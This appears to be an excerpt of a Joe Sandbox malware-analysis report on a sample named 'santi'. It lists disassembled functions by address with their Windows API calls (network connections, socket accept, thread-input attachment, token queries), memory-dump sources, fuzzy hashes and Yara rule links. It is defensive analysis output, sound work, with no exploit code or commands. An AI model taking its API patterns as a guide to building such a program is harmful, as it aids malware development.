                                                                • Instruction ID: 86c354a8504b763d42727fec2c93b37596ee09b1b421b984d3f7460ab040cdb3
                                                                • Opcode Fuzzy Hash: 8753af364bd409e54c417b3b59978a6c20931561b34ea5dcc89a931c1448f6a9
                                                                • Instruction Fuzzy Hash: 96517B71A11208AFCF22CF69C880AAE7BF9EB45320F159259F815DB2A0D770FD41CB90
                                                                Function 0031C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0031C462
                                                                • __itow.LIBCMT ref: 0031C49C
                                                                  • Part of subcall function 0031C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0031C753
                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0031C505
                                                                • __itow.LIBCMT ref: 0031C55A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$__itow
                                                                • String ID:
                                                                • API String ID: 3379773720-0
                                                                • Opcode ID: b6dee00a50e5e3ed7ff391cde5c5c4a61aad1870ce6dc45c36615ef69e16ef72
                                                                • Instruction ID: 65e2cfa837ffd93207c42b223f6d72a68792b8dd023a5d1b30fc91e381ef8bef
                                                                • Opcode Fuzzy Hash: b6dee00a50e5e3ed7ff391cde5c5c4a61aad1870ce6dc45c36615ef69e16ef72
                                                                • Instruction Fuzzy Hash: 3341E431A50208AFDF26DF55C852BEE7BB9AF4D704F400019FA05A7281DB749A95CFA1
                                                                Function 0032E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0032E742
                                                                • GetLastError.KERNEL32(?,00000000), ref: 0032E768
                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0032E78D
                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0032E7B9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                • String ID:
                                                                • API String ID: 3321077145-0
                                                                • Opcode ID: e53f3f77b075857f54c9d61bf84ab4e4ece5d1ece6412b83edd0be35d441fad0
                                                                • Instruction ID: 49e58db681be038f120488a5da621457f0d0788e64bf63b36a4f6d3706a2e3e0
                                                                • Opcode Fuzzy Hash: e53f3f77b075857f54c9d61bf84ab4e4ece5d1ece6412b83edd0be35d441fad0
                                                                • Instruction Fuzzy Hash: 5E414539600610DFCB12EF16C445A5DBBE5BF89710F0A8499E906AB3A2CB70FC50CF81
                                                                Function 0034B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0034B5D1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: InvalidateRect
                                                                • String ID:
                                                                • API String ID: 634782764-0
                                                                • Opcode ID: 19a5f28a307469c9fa51f34ddc7eee890a0985c984fa29a24329dcdeb4730f5a
                                                                • Instruction ID: 13f85f12d0bcfb8fe67efba394d5f369cacca3817ff2cade3b14bce1cede64a0
                                                                • Opcode Fuzzy Hash: 19a5f28a307469c9fa51f34ddc7eee890a0985c984fa29a24329dcdeb4730f5a
                                                                • Instruction Fuzzy Hash: 8B31DC74600208ABEB239F19CC89FA8F7E9AB06350F668151FA55DE2E1C778F9409B51
                                                                Function 0034D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ClientToScreen.USER32(?,?), ref: 0034D807
                                                                • GetWindowRect.USER32(?,?), ref: 0034D87D
                                                                • PtInRect.USER32(?,?,0034ED5A), ref: 0034D88D
                                                                • MessageBeep.USER32(00000000), ref: 0034D8FE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                • String ID:
                                                                • API String ID: 1352109105-0
                                                                • Opcode ID: 52958072f5e75c1f3355899ddc921e4ff5483afffb4fdb3e9d535a29a1d4116b
                                                                • Instruction ID: a12a9919702745f2bcf5f6f4bad1aff3437002c9c688b081cd3bfa401d347d43
                                                                • Opcode Fuzzy Hash: 52958072f5e75c1f3355899ddc921e4ff5483afffb4fdb3e9d535a29a1d4116b
                                                                • Instruction Fuzzy Hash: DE417470A00218EFCB13DF59D884AA9BBF9FB4A750F1981A9E815DF260D730F941CB40
                                                                Function 00314004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00314038
                                                                • __isleadbyte_l.LIBCMT ref: 00314066
                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00314094
                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003140CA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                • String ID:
                                                                • API String ID: 3058430110-0
                                                                • Opcode ID: e536b6683f20296eec73deac144b7101e538534eb1e7d80b660fccefdfc8a912
                                                                • Instruction ID: 80bbedcd358f76605dabaff95b0eee25956db6324dd61bd3a0acb4b81f8d6499
                                                                • Opcode Fuzzy Hash: e536b6683f20296eec73deac144b7101e538534eb1e7d80b660fccefdfc8a912
                                                                • Instruction Fuzzy Hash: C231B231600206AFDB2B9F76CC44BEABBA9BF4D310F168428E6659B190E731D8D1D790
                                                                Function 00347CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetForegroundWindow.USER32 ref: 00347CB9
                                                                  • Part of subcall function 00325F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00325F6F
                                                                  • Part of subcall function 00325F55: GetCurrentThreadId.KERNEL32 ref: 00325F76
                                                                  • Part of subcall function 00325F55: AttachThreadInput.USER32(00000000,?,0032781F), ref: 00325F7D
                                                                • GetCaretPos.USER32(?), ref: 00347CCA
                                                                • ClientToScreen.USER32(00000000,?), ref: 00347D03
                                                                • GetForegroundWindow.USER32 ref: 00347D09
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                • String ID:
                                                                • API String ID: 2759813231-0
                                                                • Opcode ID: 8b79496bb94223d1a617cf395462239b50f9cc8306522aa87e57c27a70580f02
                                                                • Instruction ID: 07445636840223f178a4123ce7dd2bfd1b80f5027484f930a5bc03032d238a66
                                                                • Opcode Fuzzy Hash: 8b79496bb94223d1a617cf395462239b50f9cc8306522aa87e57c27a70580f02
                                                                • Instruction Fuzzy Hash: 80313E71D00108AFDB01EFA5D8819EFFBFDEF55310B11846AE915E7211DA30AE058FA0
                                                                Function 0034F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • GetCursorPos.USER32(?), ref: 0034F211
                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0035E4C0,?,?,?,?,?), ref: 0034F226
                                                                • GetCursorPos.USER32(?), ref: 0034F270
                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0035E4C0,?,?,?), ref: 0034F2A6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                • String ID:
                                                                • API String ID: 2864067406-0
                                                                • Opcode ID: 22cc211a263c984c57ce19afe259a703eafc676efc07e1daeab333d580eff9cd
                                                                • Instruction ID: 002d9e0626095e483d00f9478fd318e47bc553db014d44ebe7d9448107059c33
                                                                • Opcode Fuzzy Hash: 22cc211a263c984c57ce19afe259a703eafc676efc07e1daeab333d580eff9cd
                                                                • Instruction Fuzzy Hash: 6E21823D600018AFCB178F54C858DFA7BB9EF4A750F098465F9058B1A1D3B4A951DF50
                                                                Function 0033431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00334358
                                                                  • Part of subcall function 003343E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00334401
                                                                  • Part of subcall function 003343E2: InternetCloseHandle.WININET(00000000), ref: 0033449E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                • String ID:
                                                                • API String ID: 1463438336-0
                                                                • Opcode ID: bea0710a2e84522c22d59f359b6997bb782f0c5422051e3842a06aa095b845c2
                                                                • Instruction ID: 7ae99ae1d5d3eb638eadac63e5875fb3b600f92ece9ee2304248ddaf291d9407
                                                                • Opcode Fuzzy Hash: bea0710a2e84522c22d59f359b6997bb782f0c5422051e3842a06aa095b845c2
                                                                • Instruction Fuzzy Hash: 0521D439604601BBDB179F609C80F7BB7ADFF44720F00801AFA1597550D771A8309B90
                                                                Function 00348A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00348AA6
                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00348AC0
                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00348ACE
                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00348ADC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$Long$AttributesLayered
                                                                • String ID:
                                                                • API String ID: 2169480361-0
                                                                • Opcode ID: 04b736cdaf51ed756dfa2101067af2e32f3f4a9b0534e9b52e2d65cadb5003bc
                                                                • Instruction ID: 4b08b93affe709714fb4f1c67b1eeaf8a49e86af8b6c6d714fd58b9c3c3c4889
                                                                • Opcode Fuzzy Hash: 04b736cdaf51ed756dfa2101067af2e32f3f4a9b0534e9b52e2d65cadb5003bc
                                                                • Instruction Fuzzy Hash: 8E119A31795110ABE706AB29DC05FBE779DAF85320F15811AF916CB2E2CFB0BC108B90
                                                                Function 00338A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00338AE0
                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00338AF2
                                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00338AFF
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00338B16
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastacceptselect
                                                                • String ID:
                                                                • API String ID: 385091864-0
                                                                • Opcode ID: 18cf28c7cbd237da23c1ddfe6f1d94537a9fff6eb796dedc437ce5ef55367a52
                                                                • Instruction ID: 4ca47a93f5b0c421c9a4284e461f1efc0712fa4f1b5212cb5d7dcfb8ca3f59a7
                                                                • Opcode Fuzzy Hash: 18cf28c7cbd237da23c1ddfe6f1d94537a9fff6eb796dedc437ce5ef55367a52
                                                                • Instruction Fuzzy Hash: 7721D572A001249FC7219F69CC84A9EBBFCEF4A350F01816AF849D7290DBB4DA408F90
                                                                Function 00320AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00321E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00320ABB,?,?,?,0032187A,00000000,000000EF,00000119,?,?), ref: 00321E77
                                                                  • Part of subcall function 00321E68: lstrcpyW.KERNEL32(00000000,?,?,00320ABB,?,?,?,0032187A,00000000,000000EF,00000119,?,?,00000000), ref: 00321E9D
                                                                  • Part of subcall function 00321E68: lstrcmpiW.KERNEL32(00000000,?,00320ABB,?,?,?,0032187A,00000000,000000EF,00000119,?,?), ref: 00321ECE
                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0032187A,00000000,000000EF,00000119,?,?,00000000), ref: 00320AD4
                                                                • lstrcpyW.KERNEL32(00000000,?,?,0032187A,00000000,000000EF,00000119,?,?,00000000), ref: 00320AFA
                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,0032187A,00000000,000000EF,00000119,?,?,00000000), ref: 00320B2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                • String ID: cdecl
                                                                • API String ID: 4031866154-3896280584
                                                                • Opcode ID: 4236acf2ee537c4053f714929bf7da188fa80a8e6d94c62ec0d7817d86f84ee9
                                                                • Instruction ID: fbb7c9f3137497050805d0f6112ead748ad97a89028ac4b33104ece2230c5b62
                                                                • Opcode Fuzzy Hash: 4236acf2ee537c4053f714929bf7da188fa80a8e6d94c62ec0d7817d86f84ee9
                                                                • Instruction Fuzzy Hash: 97119636210315AFDB269F74EC45D7A77A8FF49354F81406AE906CB251EBB1D850C7A0
                                                                Function 00312F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 00312FB5
                                                                  • Part of subcall function 0030395C: __FF_MSGBANNER.LIBCMT ref: 00303973
                                                                  • Part of subcall function 0030395C: __NMSG_WRITE.LIBCMT ref: 0030397A
                                                                  • Part of subcall function 0030395C: RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,00000001,00000000,?,?,002FF507,?,0000000E), ref: 0030399F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap_free
                                                                • String ID:
                                                                • API String ID: 614378929-0
                                                                • Opcode ID: 430077320499f5baa456cb4bc4bd7a0224d2a736501022dbc9538980c6dea396
                                                                • Instruction ID: 43d9db153ccf5826d45860ae9bf602b635337339b4de60f09a866d2f1bf903bf
                                                                • Opcode Fuzzy Hash: 430077320499f5baa456cb4bc4bd7a0224d2a736501022dbc9538980c6dea396
                                                                • Instruction Fuzzy Hash: 5311CD3190A2159BDB3B7F70AC156DA3BDCAF0C360F214919F8499E1A1DB70C9919691
                                                                Function 0032058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003205AC
                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003205C7
                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003205DD
                                                                • FreeLibrary.KERNEL32(?), ref: 00320632
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                • String ID:
                                                                • API String ID: 3137044355-0
                                                                • Opcode ID: f3e900302ed09459569e99dd333e01aef9cbe5adf627aab37eb2422046e57ab9
                                                                • Instruction ID: 5f14ad7763d722fd2be0f6f64e038b8fb7e0183b67db3bf7c119bd1d22aabb83
                                                                • Opcode Fuzzy Hash: f3e900302ed09459569e99dd333e01aef9cbe5adf627aab37eb2422046e57ab9
                                                                • Instruction Fuzzy Hash: 9021D071A00228EFDB26CF91FC88ADABBBCEF40700F00846DE51696011DBB5EA58DF50
                                                                Function 00326713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00326733
                                                                • _memset.LIBCMT ref: 00326754
                                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003267A6
                                                                • CloseHandle.KERNEL32(00000000), ref: 003267AF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                • String ID:
                                                                • API String ID: 1157408455-0
                                                                • Opcode ID: 793eb257ac3664b41fd620cf947f74d3900571231b06b48abbc109a0ea8bef12
                                                                • Instruction ID: 85b563fbf946432d96ecad98db6804a7509975a136f18d8308035ae53ed52156
                                                                • Opcode Fuzzy Hash: 793eb257ac3664b41fd620cf947f74d3900571231b06b48abbc109a0ea8bef12
                                                                • Instruction Fuzzy Hash: AC110A75D012287AE72157A9BC4DFABBBBCEF44724F10419AF504E71C0D2744E808B74
                                                                Function 0031B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0031AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0031AA79
                                                                  • Part of subcall function 0031AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0031AA83
                                                                  • Part of subcall function 0031AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0031AA92
                                                                  • Part of subcall function 0031AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0031AA99
                                                                  • Part of subcall function 0031AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0031AAAF
                                                                • GetLengthSid.ADVAPI32(?,00000000,0031ADE4,?,?), ref: 0031B21B
                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0031B227
                                                                • HeapAlloc.KERNEL32(00000000), ref: 0031B22E
                                                                • CopySid.ADVAPI32(?,00000000,?), ref: 0031B247
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                • String ID:
                                                                • API String ID: 4217664535-0
                                                                • Opcode ID: 2f796d80418c594c6c09a2855ba4339aea62dbe270a61140b7e177072ee9f6c6
                                                                • Instruction ID: 8b28d8a32e5f2f06d3ece76b311b32332046f21f9268282d445c13683f7e8c74
